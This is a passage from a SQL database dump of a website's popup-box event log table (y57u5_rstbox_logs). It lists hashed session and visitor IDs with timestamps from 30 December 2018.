(44186, 'a723231fca5047cf0e2c2f10ac904cea', 'fbf0576065758144', 0, 2, 1, '2018-12-30 05:58:36'),
(44187, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:00:55'),
(44188, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:01:53'),
(44189, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:02:49'),
(44190, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:03:01'),
(44191, 'd431c4283ef6cd2ee7c4af4b4723bd4b', 'b5569667369b4c76', 0, 2, 1, '2018-12-30 06:05:05'),
(44192, 'd431c4283ef6cd2ee7c4af4b4723bd4b', 'b5569667369b4c76', 0, 2, 1, '2018-12-30 06:05:10'),
(44193, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:05:43'),
(44194, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:06:13'),
(44195, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:06:32'),
(44196, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:06:52'),
(44197, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:07:52'),
(44198, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:08:36'),
(44199, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:09:07'),
(44200, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:10:49'),
(44201, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:14:47'),
(44202, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:15:19'),
(44203, '85bceda6ec3930770340d97e574b3621', '3a1bb2790411266a', 0, 2, 1, '2018-12-30 06:16:42'),
(44204, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:17:57'),
(44205, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:20:03'),
(44206, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:20:16'),
(44207, 'ff0b2188a2afffab288a1a5735f63d1d', 'f51f9a7b91f82cf5', 0, 2, 1, '2018-12-30 06:20:19'),
(44208, '2ba303ad2fb6c2e134a2c462ce020b3f', '9fa71c818742c95f', 0, 2, 1, '2018-12-30 06:23:21'),
(44209, '31edcf9b9612f4898c0183ac20317a32', '7501b42c35accff7', 0, 2, 1, '2018-12-30 06:26:34'),
(44210, 'a76052b8737786942f95986f78162fa0', '39d66f8e3003b1ba', 0, 2, 1, '2018-12-30 06:26:45'),
(44211, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:28:24'),
(44212, '07138b026b0585f99d153b28ba583c29', 'df27b9a2919a8206', 0, 2, 1, '2018-12-30 06:28:36'),
(44213, '07138b026b0585f99d153b28ba583c29', 'df27b9a2919a8206', 0, 2, 1, '2018-12-30 06:28:42'),
(44214, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:29:00'),
(44215, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:29:21'),
(44216, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:30:11'),
(44217, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:30:54'),
(44218, 'a75a21d64befbdf5bfb218432985cf27', '1c68b977b911188c', 0, 2, 1, '2018-12-30 06:32:27'),
(44219, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:33:47'),
(44220, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:33:50'),
(44221, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:34:23'),
(44222, '07138b026b0585f99d153b28ba583c29', 'df27b9a2919a8206', 0, 2, 1, '2018-12-30 06:35:17'),
(44223, '07138b026b0585f99d153b28ba583c29', 'df27b9a2919a8206', 0, 2, 1, '2018-12-30 06:35:58'),
(44224, '07138b026b0585f99d153b28ba583c29', 'df27b9a2919a8206', 0, 2, 1, '2018-12-30 06:36:33'),
(44225, '66295fd8be35525b738b95335d59f8e4', '34e6c9536efc3e94', 0, 2, 1, '2018-12-30 06:37:29'),
(44226, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:38:21'),
(44227, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:39:24'),
(44228, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:40:16'),
(44229, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:40:23'),
(44230, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:40:36'),
(44231, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:41:07'),
(44232, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:41:13'),
(44233, 'a75a21d64befbdf5bfb218432985cf27', '1c68b977b911188c', 0, 2, 1, '2018-12-30 06:41:26'),
(44234, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:42:02'),
(44235, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:47:18'),
(44236, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:49:34'),
(44237, '7fdef91b3becccfdf04bc70d302aef5b', '6e117bd555667400', 0, 2, 1, '2018-12-30 06:51:48'),
(44238, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:52:54'),
(44239, '468e7d0885ead421e81ed094ba36e9c7', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-30 06:53:03'),
(44240, 'a75a21d64befbdf5bfb218432985cf27', '1c68b977b911188c', 0, 2, 1, '2018-12-30 06:53:59'),
(44241, '468e7d0885ead421e81ed094ba36e9c7', 'b4ecb18ba7992a18', 0, 2, 1, '2018-12-30 06:54:08'),
(44242, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:54:10'),
(44243, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 06:54:46'),
(44244, '1ca70bc3f8c5602d7c0191d94f62aade', 'c996d3f4a66c1d4b', 0, 2, 1, '2018-12-30 06:56:16'),
(44245, 'c5bdddc1fa7dbf6998aa30b009396c90', '5aef41227560c3ee', 0, 2, 1, '2018-12-30 06:58:35'),
(44246, '9f681940a72578870481b281f77bad7e', 'c520b35eb4576872', 0, 2, 1, '2018-12-30 06:58:58'),
(44247, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 06:59:01'),
(44248, '74156785f5d78c8962a4c56dcc6d31db', '0107482d6190a77f', 0, 2, 1, '2018-12-30 06:59:14'),
(44249, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-30 06:59:19'),
(44250, '58afafec8b07a1a64a55bf96f79a06d1', '21afa26d304eff75', 0, 2, 1, '2018-12-30 07:00:27'),
(44251, '9f681940a72578870481b281f77bad7e', 'c520b35eb4576872', 0, 2, 1, '2018-12-30 07:00:34'),
(44252, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:00:59'),
(44253, '07138b026b0585f99d153b28ba583c29', 'df27b9a2919a8206', 0, 2, 1, '2018-12-30 07:01:07'),
(44254, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:01:34'),
(44255, 'a723231fca5047cf0e2c2f10ac904cea', 'fbf0576065758144', 0, 2, 1, '2018-12-30 07:02:03'),
(44256, '74156785f5d78c8962a4c56dcc6d31db', '0107482d6190a77f', 0, 2, 1, '2018-12-30 07:02:43'),
(44257, 'a75a21d64befbdf5bfb218432985cf27', '1c68b977b911188c', 0, 2, 1, '2018-12-30 07:02:46'),
(44258, '76a9582fabd688456dfa3cc6cd76ae6d', 'd3902e08ef0206de', 0, 2, 1, '2018-12-30 07:03:35'),
(44259, '76a9582fabd688456dfa3cc6cd76ae6d', 'd3902e08ef0206de', 0, 2, 1, '2018-12-30 07:04:58'),
(44260, '6e48a6c57c8ada18e9bbe80162f61178', 'fda985193413b262', 0, 2, 1, '2018-12-30 07:05:30'),
(44261, 'd431c4283ef6cd2ee7c4af4b4723bd4b', 'b5569667369b4c76', 0, 2, 1, '2018-12-30 07:05:59'),
(44262, '6e48a6c57c8ada18e9bbe80162f61178', 'fda985193413b262', 0, 2, 1, '2018-12-30 07:06:02'),
(44263, 'bdafd693aa02b1052d9c1d08da07f02a', '0b49ee53351ae180', 0, 2, 1, '2018-12-30 07:06:09'),
(44264, '229da97bb9ecd3d21c74e669534f2926', '46713cac27a94b83', 0, 2, 1, '2018-12-30 07:06:38'),
(44265, 'cab2161ba3520f2f7a048ae9934818a1', 'a8526f6e757f5fda', 0, 2, 1, '2018-12-30 07:06:58'),
(44266, '229da97bb9ecd3d21c74e669534f2926', '46713cac27a94b83', 0, 2, 1, '2018-12-30 07:07:36'),
(44267, '0f5998df054a9d01fd63e85034bf0f03', 'c0d620ee8725a926', 0, 2, 1, '2018-12-30 07:08:56'),
(44268, '0cb198303711061a7060cf9ca61ce085', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-30 07:09:32'),
(44269, 'bc2f236a2ff1820f3344a4bf75361e45', '36146e1f6045b395', 0, 2, 1, '2018-12-30 07:15:27'),
(44270, '0cb198303711061a7060cf9ca61ce085', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-30 07:16:19'),
(44271, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-30 07:16:42'),
(44272, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-30 07:17:24'),
(44273, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:17:29'),
(44274, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-30 07:17:45'),
(44275, '31edcf9b9612f4898c0183ac20317a32', '7501b42c35accff7', 0, 2, 1, '2018-12-30 07:17:47'),
(44276, '9f681940a72578870481b281f77bad7e', 'c520b35eb4576872', 0, 2, 1, '2018-12-30 07:18:01'),
(44277, '41f1cd21ae07364087aad2898c2df626', '629ac4ab56bd2f1d', 0, 2, 1, '2018-12-30 07:18:14'),
(44278, '82a27cc61e77c8ec6aefef2739c51180', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-30 07:18:25'),
(44279, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:18:28'),
(44280, '72c137a77a6290ef05ace10cbc75b561', 'f19010d8a5f137d0', 0, 2, 1, '2018-12-30 07:18:35'),
(44281, 'd56c509e91ad2d2c01076ab9df9e1b2e', 'baa8d16c1a4e5230', 0, 2, 1, '2018-12-30 07:19:57'),
(44282, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:22:01'),
(44283, 'c65dbfbf3be589718b03983c166e9b7e', '33f9389652fef1ac', 0, 2, 1, '2018-12-30 07:23:23'),
(44284, 'c65dbfbf3be589718b03983c166e9b7e', '33f9389652fef1ac', 0, 2, 1, '2018-12-30 07:23:37'),
(44285, 'c65dbfbf3be589718b03983c166e9b7e', '33f9389652fef1ac', 0, 2, 1, '2018-12-30 07:24:20'),
(44286, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:26:51'),
(44287, 'd61c47d5050df40463af489d1b4e769c', '037eb1dd80d9d5ea', 0, 2, 1, '2018-12-30 07:27:59'),
(44288, '59a5a5fd4c8b5ca028840031fb1cf130', '9b439e4e6dd53e8a', 0, 2, 1, '2018-12-30 07:28:58'),
(44289, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:29:28'),
(44290, 'bd0a1b5fecea64ce5864e050c4ff77ae', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-30 07:31:09'),
(44291, 'bd0a1b5fecea64ce5864e050c4ff77ae', '638f6b1ac3b915c3', 0, 2, 1, '2018-12-30 07:32:32'),
(44292, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:32:39'),
(44293, '8e02eb0e523ba0c0882b3919015ceb43', '9234c34668bf2ded', 0, 2, 1, '2018-12-30 07:33:03'),
(44294, '2f41415fe794a20afdd873289150f3be', '0b1466b4de9b8a16', 0, 2, 1, '2018-12-30 07:33:41'),
(44295, '0949e36d28a5bcf1b42a821f95acc288', 'ec138ac7c35c53a7', 0, 2, 1, '2018-12-30 07:34:25'),
(44296, 'c65dbfbf3be589718b03983c166e9b7e', '33f9389652fef1ac', 0, 2, 1, '2018-12-30 07:34:35'),
(44297, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-30 07:34:55'),
(44298, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:35:00'),
(44299, '147da3ff775a1ff6ef7097ac734a1d46', '6e117bd555667400', 0, 2, 1, '2018-12-30 07:35:37'),
(44300, '4d023866f70a3d0fc3cd9f5c84b03f10', '687058b58830fd3e', 0, 2, 1, '2018-12-30 07:38:11'),
(44301, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-30 07:40:22'),
(44302, '062a0a92fb7f693f0712a73db9ebcfc4', '91d21119de46096c', 0, 2, 1, '2018-12-30 07:40:33'),
(44303, '504bfc304165b0b0673071583488b0a4', '6092d6c1cb041b23', 0, 2, 1, '2018-12-30 07:42:54'),
(44304, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-30 07:47:21'),
(44305, '82a27cc61e77c8ec6aefef2739c51180', 'b53c70bea01d2d6e', 0, 2, 1, '2018-12-30 07:49:03'),
(44306, '5cc9831e44bc8420e2093780372bb239', 'bef82449f874d632', 0, 2, 1, '2018-12-30 07:52:32'),
(44307, 'f31d0f197e01672f2208ae0d2e3f7884', '3233431a244017cd', 0, 2, 1, '2018-12-30 07:56:09'),
(44308, '0bef6b01a26cb83f4469b7f4a41ce96e', '37c6d85bc2eb625e', 0, 2, 1, '2018-12-30 07:57:07'),
(44309, '0bef6b01a26cb83f4469b7f4a41ce96e', '37c6d85bc2eb625e', 0, 2, 1, '2018-12-30 07:57:24'),
(44310, '2a0a0138bcdb6737b53bd05022135d16', '8ec512355372d256', 0, 2, 1, '2018-12-30 07:59:25'),
(44311, '2a0a0138bcdb6737b53bd05022135d16', '8ec512355372d256', 0, 2, 1, '2018-12-30 08:00:12'),
(44312, '2a0a0138bcdb6737b53bd05022135d16', '8ec512355372d256', 0, 2, 1, '2018-12-30 08:00:22'),
(44313, '2a0a0138bcdb6737b53bd05022135d16', '8ec512355372d256', 0, 2, 1, '2018-12-30 08:00:47'),
(44314, '2c7324124063cade1577f81c012c45b7', 'bcda4b8472c12850', 0, 2, 1, '2018-12-30 08:03:52'),
(44315, '0d580ffb2894fc1c4954e3dac642a367', '813518eddc998d16', 0, 2, 1, '2018-12-30 08:04:50'),
(44316, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-30 08:06:39'),
(44317, '147da3ff775a1ff6ef7097ac734a1d46', '6e117bd555667400', 0, 2, 1, '2018-12-30 08:07:27'),
(44318, '147da3ff775a1ff6ef7097ac734a1d46', '6e117bd555667400', 0, 2, 1, '2018-12-30 08:07:43'),
(44319, '5cc9831e44bc8420e2093780372bb239', 'bef82449f874d632', 0, 2, 1, '2018-12-30 08:07:49'),
(44320, '5cc9831e44bc8420e2093780372bb239', 'bef82449f874d632', 0, 2, 1, '2018-12-30 08:09:56'),
(44321, '322a86a27f639592f5b8bbe58a658efe', '3c2eb30b505dddcf', 0, 2, 1, '2018-12-30 08:10:14'),
(44322, '229da97bb9ecd3d21c74e669534f2926', '46713cac27a94b83', 0, 2, 1, '2018-12-30 08:10:41'),
(44323, 'bf0a0b4eb7a703553582f9af4cd53171', 'c5b9fd5b72abf8c4', 0, 2, 1, '2018-12-30 08:13:06'),
(44324, 'b5228ea079e3b975f6f37c5d79882505', 'c5e6f9b672126876', 0, 2, 1, '2018-12-30 08:14:55'),
(44325, '5cc9831e44bc8420e2093780372bb239', 'bef82449f874d632', 0, 2, 1, '2018-12-30 08:16:37'),
(44326, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-30 08:17:28'),
(44327, '93f53a3df56b00652622c8cb47539aa1', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-30 08:19:31');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(44328, '93f53a3df56b00652622c8cb47539aa1', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-30 08:20:33'),
(44329, '3bee0c73f4a9ababe56a622093cb4d02', '00d3edb8afb1ea5b', 0, 2, 1, '2018-12-30 08:20:42'),
(44330, 'ffac91c67f93f0f910dbd50ff0580b3a', 'afdb985b4766b5e9', 0, 2, 1, '2018-12-30 08:20:44'),
(44331, 'ffac91c67f93f0f910dbd50ff0580b3a', 'afdb985b4766b5e9', 0, 2, 1, '2018-12-30 08:21:40'),
(44332, '4e5b5528527e435e1e86fc00edafa362', '7c5bcf99f2070582', 0, 2, 1, '2018-12-30 08:22:31'),
(44333, 'ce6a4a1d5dea52d48870bf5d2f48a9b3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-30 08:22:55'),
(44334, '93f53a3df56b00652622c8cb47539aa1', '4752c8cc4e1a75ca', 0, 2, 1, '2018-12-30 08:22:56'),
(44335, 'ffac91c67f93f0f910dbd50ff0580b3a', 'afdb985b4766b5e9', 0, 2, 1, '2018-12-30 08:23:10'),
(44336, 'ce6a4a1d5dea52d48870bf5d2f48a9b3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-30 08:23:13'),
(44337, 'ffac91c67f93f0f910dbd50ff0580b3a', 'afdb985b4766b5e9', 0, 2, 1, '2018-12-30 08:23:23'),
(44338, '5cc9831e44bc8420e2093780372bb239', 'bef82449f874d632', 0, 2, 1, '2018-12-30 08:23:37'),
(44339, 'ce6a4a1d5dea52d48870bf5d2f48a9b3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-30 08:24:14'),
(44340, 'c2083329b8c07281279f5c7a3523db1a', '772563626361d54a', 0, 2, 1, '2018-12-30 08:25:45'),
(44341, '1a2a890c954bfe22d3e82de51fd62132', '83bb13387505b354', 0, 2, 1, '2018-12-30 08:26:38'),
(44342, '529e1180e98068cd56a5c0f894918242', 'ebabed6b77b17bec', 0, 2, 1, '2018-12-30 08:28:09'),
(44343, '529e1180e98068cd56a5c0f894918242', 'ebabed6b77b17bec', 0, 2, 1, '2018-12-30 08:28:21'),
(44344, '0cb198303711061a7060cf9ca61ce085', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-30 08:31:23'),
(44345, '87861ff9eac8f2694c437d5393839416', 'cb2cf4d71770a931', 0, 2, 1, '2018-12-30 08:36:03'),
(44346, '017f2336af865ac897e1ae7954598e09', '5f1a5e3746fc49b8', 0, 2, 1, '2018-12-30 08:36:27'),
(44347, '2e01a8e4bd2a5669e30c40d2ba92b0d4', 'cd93a325f777ebe6', 0, 2, 1, '2018-12-30 08:36:58'),
(44348, '9fed7b812eea153f0cc5fb380a7209ad', 'ee0826f8778c48c2', 0, 2, 1, '2018-12-30 08:39:57'),
(44349, 'a48afdf7ccb6b55d7553ab3100fd1440', '296d9de09b136627', 0, 2, 1, '2018-12-30 08:40:22'),
(44350, 'a48afdf7ccb6b55d7553ab3100fd1440', '296d9de09b136627', 0, 2, 1, '2018-12-30 08:40:37'),
(44351, '344ec04f28b01cae5511e9225d20b6f1', '366894ed0e80340b', 0, 2, 1, '2018-12-30 08:41:05'),
(44352, '331f652289f3cfbf9e51911ab619bda5', '3f619a4ed1bd3227', 0, 2, 1, '2018-12-30 08:43:04'),
(44353, '584acf4ae605c82e4ec5d9ca85f583e6', '51df446c19685386', 0, 2, 1, '2018-12-30 08:43:09'),
(44354, '038970fa350cdc1cfda867e929875c2f', '3c2eb30b505dddcf', 0, 2, 1, '2018-12-30 08:43:20'),
(44355, '038970fa350cdc1cfda867e929875c2f', '3c2eb30b505dddcf', 0, 2, 1, '2018-12-30 08:43:52'),
(44356, '1697da0224355714ddb8d732c1923318', 'f90aba74fc059d29', 0, 2, 1, '2018-12-30 08:45:47'),
(44357, 'e312837597ee68857c2349680f87ba48', 'da6c922121ca1f89', 0, 2, 1, '2018-12-30 08:46:52'),
(44358, '34352aaf5975d9d931ce93db23677b20', '649968f19d40482a', 0, 2, 1, '2018-12-30 08:47:16'),
(44359, '34352aaf5975d9d931ce93db23677b20', '649968f19d40482a', 0, 2, 1, '2018-12-30 08:47:30'),
(44360, '1697da0224355714ddb8d732c1923318', 'f90aba74fc059d29', 0, 2, 1, '2018-12-30 08:48:51'),
(44361, '78ef29f6e923d7ca0ba8e6219727ed77', '42c40d2ba8e4ad6c', 0, 2, 1, '2018-12-30 08:49:13'),
(44362, '2a0a0138bcdb6737b53bd05022135d16', '8ec512355372d256', 0, 2, 1, '2018-12-30 08:49:41'),
(44363, 'e312837597ee68857c2349680f87ba48', 'da6c922121ca1f89', 0, 2, 1, '2018-12-30 08:50:33'),
(44364, 'c4305a41dec55dbb158bf0f0aa98d920', '8bbf9b925be43a0c', 0, 2, 1, '2018-12-30 08:50:41'),
(44365, '9c3146a1c7fa1e66f22f92d03eecaefd', '45557f71f98e1e99', 0, 2, 1, '2018-12-30 08:52:39'),
(44366, 'bdafd693aa02b1052d9c1d08da07f02a', '0b49ee53351ae180', 0, 2, 1, '2018-12-30 08:57:38'),
(44367, 'c4305a41dec55dbb158bf0f0aa98d920', '8bbf9b925be43a0c', 0, 2, 1, '2018-12-30 09:00:45'),
(44368, '6074ba24dd0838f0e923864b98894280', '6b51e8cedcdee7e0', 0, 2, 1, '2018-12-30 09:02:14'),
(44369, '7c8b4e8d28cb04ba782d3e4197eb360f', '113a26d6adf3f967', 0, 2, 1, '2018-12-30 09:04:03'),
(44370, '75aab57ffc363cae71153244f0ff0f9e', '246550aee8750b32', 0, 2, 1, '2018-12-30 09:04:53'),
(44371, '4852016a7d5007b157b70424b96abdaa', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-30 09:06:17'),
(44372, '7c8b4e8d28cb04ba782d3e4197eb360f', '113a26d6adf3f967', 0, 2, 1, '2018-12-30 09:06:42'),
(44373, '06352663eafe099cfc9d03d8c9927fe7', '01f680719455d4b2', 0, 2, 1, '2018-12-30 09:09:32'),
(44374, '2833f5350cdc6992bc615e015d5cd5ae', '3233431a244017cd', 0, 2, 1, '2018-12-30 09:12:32'),
(44375, '0f42874fce4bdd98b1683fd3da1e0c0f', 'a0491b140cd92a93', 0, 2, 1, '2018-12-30 09:15:02'),
(44376, '7c8b4e8d28cb04ba782d3e4197eb360f', '113a26d6adf3f967', 0, 2, 1, '2018-12-30 09:16:05'),
(44377, '439e7ff8d9e75b4b162a2f164cbab858', '0b8f5bcf2f352ba9', 0, 2, 1, '2018-12-30 09:19:08'),
(44378, 'f2cc473727633bd6cd8341c8d088293f', 'd7036fef56eff751', 0, 2, 1, '2018-12-30 09:21:35'),
(44379, '0268073b101af1b75a12722e4098647c', '15fdd013f34287ab', 0, 2, 1, '2018-12-30 09:21:56'),
(44380, 'e3362450dfd749751a102feaa321ebb0', '77763fe8efd0a111', 0, 2, 1, '2018-12-30 09:23:06'),
(44381, '1675887d07ad1bedda55ed52cb1643d9', 'c5e6f9b672126876', 0, 2, 1, '2018-12-30 09:26:07'),
(44382, '372e919b65e6ef85b10b7d0f722ce49d', '4ae0e6974a830cbf', 0, 2, 1, '2018-12-30 09:27:08'),
(44383, 'a23c554b9a38eaece75cf9a9ebec4e19', 'd1f8ea0116bd1437', 0, 2, 1, '2018-12-30 09:27:52'),
(44384, '496856db4c4e73d387e9c64e5d3a3398', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-30 09:28:56'),
(44385, '496856db4c4e73d387e9c64e5d3a3398', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-30 09:29:09'),
(44386, '8d19d6ed593d21f83b14bde437823306', 'bef82449f874d632', 0, 2, 1, '2018-12-30 09:30:33'),
(44387, '3aa9c0da83ac25a5b56ac234fd48a555', '4a9bbb053e611d1d', 0, 2, 1, '2018-12-30 09:30:37'),
(44388, '3aa9c0da83ac25a5b56ac234fd48a555', '4a9bbb053e611d1d', 0, 2, 1, '2018-12-30 09:30:52'),
(44389, '8d19d6ed593d21f83b14bde437823306', 'bef82449f874d632', 0, 2, 1, '2018-12-30 09:31:09'),
(44390, '42c13a63676963e72e69744499b1feec', 'de580675a5823c8e', 0, 2, 1, '2018-12-30 09:44:13'),
(44391, 'ce6a4a1d5dea52d48870bf5d2f48a9b3', '1d9c54d0b37930ed', 0, 2, 1, '2018-12-30 09:44:38'),
(44392, '3c2dbf5ac16902c963ec43b5b9d50cae', 'f2dcff99c6fde162', 0, 2, 1, '2018-12-30 09:45:02'),
(44393, '3c2dbf5ac16902c963ec43b5b9d50cae', 'f2dcff99c6fde162', 0, 2, 1, '2018-12-30 09:45:14'),
(44394, '439e7ff8d9e75b4b162a2f164cbab858', '0b8f5bcf2f352ba9', 0, 2, 1, '2018-12-30 09:52:58'),
(44395, '1675887d07ad1bedda55ed52cb1643d9', 'c5e6f9b672126876', 0, 2, 1, '2018-12-30 09:53:02'),
(44396, '4852016a7d5007b157b70424b96abdaa', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-30 09:54:07'),
(44397, 'd42fc5dc68a16a27ec1a4941bccaf0b7', '5a08da7046298e7a', 0, 2, 1, '2018-12-30 09:57:36'),
(44398, '31329ece6bb17db201dd29174ae7bd14', '38037cb31b3b9fc2', 0, 2, 1, '2018-12-30 09:57:38'),
(44399, '9d183f8a6a365e60ca1b03d581df95ad', 'c6e97f17cebc7ba8', 0, 2, 1, '2018-12-30 10:00:54'),
(44400, '439e7ff8d9e75b4b162a2f164cbab858', '0b8f5bcf2f352ba9', 0, 2, 1, '2018-12-30 10:02:00'),
(44401, '42c13a63676963e72e69744499b1feec', 'de580675a5823c8e', 0, 2, 1, '2018-12-30 10:03:15'),
(44402, '496856db4c4e73d387e9c64e5d3a3398', 'c77bd0e6aa3ba09b', 0, 2, 1, '2018-12-30 10:03:35'),
(44403, 'c0ffb691887aab975fa4cac10c168e4b', 'a9508bb573ce7f9e', 0, 2, 1, '2018-12-30 10:09:55'),
(44404, 'b2a06dd7acf57f6109700b6408394ed6', 'fd8632d140144f5e', 0, 2, 1, '2018-12-30 10:12:28'),
(44405, 'b2a06dd7acf57f6109700b6408394ed6', 'fd8632d140144f5e', 0, 2, 1, '2018-12-30 10:13:00'),
(44406, 'd42fc5dc68a16a27ec1a4941bccaf0b7', '5a08da7046298e7a', 0, 2, 1, '2018-12-30 10:13:02'),
(44407, '64ede9075a14542fc110ec2336ad6662', 'db08057c2ad109b4', 0, 2, 1, '2018-12-30 10:14:36'),
(44408, 'a23c554b9a38eaece75cf9a9ebec4e19', 'd1f8ea0116bd1437', 0, 2, 1, '2018-12-30 10:23:35'),
(44409, '7c8b4e8d28cb04ba782d3e4197eb360f', '113a26d6adf3f967', 0, 2, 1, '2018-12-30 10:26:40'),
(44410, 'dbd1246e01156858d87fc5ba076a0383', 'c020abbb40884763', 0, 2, 1, '2018-12-30 10:28:34'),
(44411, 'dbd1246e01156858d87fc5ba076a0383', 'c020abbb40884763', 0, 2, 1, '2018-12-30 10:29:05'),
(44412, 'a23c554b9a38eaece75cf9a9ebec4e19', 'd1f8ea0116bd1437', 0, 2, 1, '2018-12-30 10:29:11'),
(44413, '7f8d8c3bd401780765fc668b90eae623', '3af9b7e4984c53a2', 0, 2, 1, '2018-12-30 10:29:56'),
(44414, 'd338ceefe042a206e09d1eec070d8211', 'e5ac70981815b3ea', 0, 2, 1, '2018-12-30 10:30:27'),
